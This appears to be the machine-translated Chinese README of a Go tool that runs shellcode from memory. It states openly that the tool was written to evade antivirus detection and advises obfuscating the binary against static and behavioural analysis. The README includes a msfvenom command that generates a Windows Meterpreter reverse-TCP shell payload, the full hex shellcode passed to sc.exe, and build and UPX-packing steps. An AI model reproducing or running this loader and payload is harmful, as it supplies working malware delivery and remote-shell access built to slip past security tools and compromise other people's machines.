go shellcode
1.0.0
這是一個從內存中運行ShellCode作為其自己的過程的程序。這是為了擊敗反病毒檢測而寫的。現在,這被發現為虛擬:win32/shrine.a。使用垃圾等工具來混淆二進制以擊敗靜態分析。自己更改代碼以擊敗行為分析。
請記住,只有64位殼牌將在64位進程中運行。這無法自動檢測您的ShellCode體系結構。
使用MSFVENOM或METASPLOIT來生成一些shellcode作為十六進制格式:
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
有時,殼碼大於帶有參數的命令行的極限。嘗試將整個內容放入批處理腳本中。
標準的GO建築步驟。將Goos設置為windows和Goarch與您的ShellCode相同,分別為386或amd64 。這無法檢測您的ShellCode的體系結構。
由此產生的二進制有點大,210萬,但與UPX相連,大約508K。